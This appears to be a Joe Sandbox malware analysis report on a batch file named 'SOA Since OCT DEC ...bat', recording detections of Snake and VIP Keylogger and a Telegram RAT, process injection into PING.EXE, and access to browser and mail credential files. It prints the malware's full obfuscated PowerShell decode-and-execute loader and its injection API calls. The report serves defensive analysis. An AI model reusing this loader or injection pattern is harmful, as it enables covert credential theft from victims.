Source: PING.EXE, 00000008.00000003.1393293221.0000000005726000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: PING.EXE, 00000008.00000003.1393293221.0000000005726000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: PING.EXE, 00000008.00000003.1393293221.0000000005726000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: PING.EXE, 00000008.00000003.1393293221.0000000005726000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696494690
Source: PING.EXE, 00000008.00000003.1393293221.0000000005726000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: PING.EXE, 00000008.00000003.1393293221.0000000005726000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696494690f
Source: PING.EXE, 00000008.00000003.1393293221.0000000005726000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Process token adjusted: Debug	Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell decode and execute

Source: Yara match

File source: amsi64_3820.amsi.csv, type: OTHER

.NET source code contains process injector

Source: 2.2.powershell.exe.1beccf163d0.0.raw.unpack, cdXfw.cs	.Net Code: WNDZX contains injection code
Source: 2.2.powershell.exe.1bed4be0000.1.raw.unpack, cdXfw.cs	.Net Code: WNDZX contains injection code
Source: ilgwppf0.dll.9.dr, cdXfw.cs	.Net Code: WNDZX contains injection code

.NET source code references suspicious native API functions

Source: 2.2.powershell.exe.1beccf163d0.0.raw.unpack, cdXfw.cs	Reference to suspicious API methods: NtAllocateVirtualMemory(process.Handle, ref BJGCZ, 0u, ref NlYZC, 12288u, 64u)
Source: 2.2.powershell.exe.1beccf163d0.0.raw.unpack, cdXfw.cs	Reference to suspicious API methods: NtWriteVirtualMemory(process.Handle, BJGCZ, array, NlYZC, ref rFxdG)
Source: 2.2.powershell.exe.1beccf163d0.0.raw.unpack, cdXfw.cs	Reference to suspicious API methods: NtCreateThreadEx(ref hPvvx, 2097151u, IntPtr.Zero, process.Handle, BJGCZ, IntPtr.Zero, 0u, 0u, 0u, 0u, IntPtr.Zero)
Source: 8.2.PING.EXE.68c0000.0.raw.unpack, Z1.cs	Reference to suspicious API methods: LoadLibrary(b1)
Source: 8.2.PING.EXE.68c0000.0.raw.unpack, Z1.cs	Reference to suspicious API methods: GetProcAddress(intPtr, b2)
Source: 8.2.PING.EXE.68c0000.0.raw.unpack, Z1.cs	Reference to suspicious API methods: VirtualProtect(procAddress, (UIntPtr)4uL, 64u, out var _)

Creates a thread in another existing process (thread injection)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread created: C:\Windows\SysWOW64\PING.EXE EIP: 770000

Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\SysWOW64\PING.EXE base: 770000

Jump to behavior

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWERSHEll -W h -COMmAnd "$WnordsrAlZoeriJHdDFkhPjtOFOv='C:\Users\user\Desktop\SOA Since OCT DEC 241738316681530012900.bat';$RluHfbONocRBKtFAQykvSfeFXskG=-254500..-1;$DvcYeviAehzPTwTBlDZnJicPUSdm=[sySTem.TEXt.EncOdinG]::UTf8.GetsTriNg([CONVerT]::FROmBaSe64STRinG((GeT-cOnTeNt $WnordsrAlZoeriJHdDFkhPjtOFOv -Raw)[$RluHfbONocRBKtFAQykvSfeFXskG]));iex $DvcYeviAehzPTwTBlDZnJicPUSdm"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM ping.exe /F	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c C:\WIndows\SysWOW64\PING.EXE 127.0.0.1 -t	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ilgwppf0\ilgwppf0.cmdline"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE C:\WIndows\SysWOW64\PING.EXE 127.0.0.1 -t	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD873.tmp" "c:\Users\user\AppData\Local\Temp\ilgwppf0\CSCDCE9C332863C4D8BB51C4E706A50F0F.TMP"	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM ping.exe /F

Jump to behavior

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w h -command "$wnordsralzoerijhddfkhpjtofov='c:\users\user\desktop\soa since oct dec 241738316681530012900.bat';$rluhfbonocrbktfaqykvsfefxskg=-254500..-1;$dvcyeviaehzptwtbldznjicpusdm=[system.text.encoding]::utf8.getstring([convert]::frombase64string((get-content $wnordsralzoerijhddfkhpjtofov -raw)[$rluhfbonocrbktfaqykvsfefxskg]));iex $dvcyeviaehzptwtbldznjicpusdm"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w h -command "$wnordsralzoerijhddfkhpjtofov='c:\users\user\desktop\soa since oct dec 241738316681530012900.bat';$rluhfbonocrbktfaqykvsfefxskg=-254500..-1;$dvcyeviaehzptwtbldznjicpusdm=[system.text.encoding]::utf8.getstring([convert]::frombase64string((get-content $wnordsralzoerijhddfkhpjtofov -raw)[$rluhfbonocrbktfaqykvsfefxskg]));iex $dvcyeviaehzptwtbldznjicpusdm"			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match

File source: 00000008.00000002.3328916486.0000000004451000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 8.2.PING.EXE.6900000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.PING.EXE.6900000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.3332252610.0000000006900000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3330969381.00000000054CA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PING.EXE PID: 3612, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 8.2.PING.EXE.6900000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.PING.EXE.6900000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.3332252610.0000000006900000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3330969381.00000000054CA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PING.EXE PID: 3612, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\PING.EXE	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\PING.EXE

File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\

Jump to behavior

Source: Yara match	File source: 8.2.PING.EXE.6900000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.PING.EXE.6900000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.3332252610.0000000006900000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3330969381.00000000054CA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PING.EXE PID: 3612, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match

File source: 00000008.00000002.3328916486.0000000004451000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 8.2.PING.EXE.6900000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.PING.EXE.6900000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.3332252610.0000000006900000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3330969381.00000000054CA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PING.EXE PID: 3612, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 8.2.PING.EXE.6900000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.PING.EXE.6900000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.3332252610.0000000006900000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3330969381.00000000054CA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PING.EXE PID: 3612, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	1 Windows Management Instrumentation	1 Scripting	1 DLL Side-Loading	1 Disable or Modify Tools	1 OS Credential Dumping	2 File and Directory Discovery	Remote Services	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	1 DLL Side-Loading	311 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	23 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Command and Scripting Interpreter	Logon Script (Windows)	Logon Script (Windows)	21 Obfuscated Files or Information	Security Account Manager	11 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	2 PowerShell	Login Hook	Login Hook	1 Software Packing	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	31 Virtualization/Sandbox Evasion	SSH	Keylogging	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	11 Masquerading	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	31 Virtualization/Sandbox Evasion	DCSync	1 Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	311 Process Injection	Proc Filesystem	11 System Network Configuration Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report SOA Since OCT DEC 241738316681530012900.bat

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: VIP Keylogger

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Other

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
SOA Since OCT DEC 241738316681530012900.bat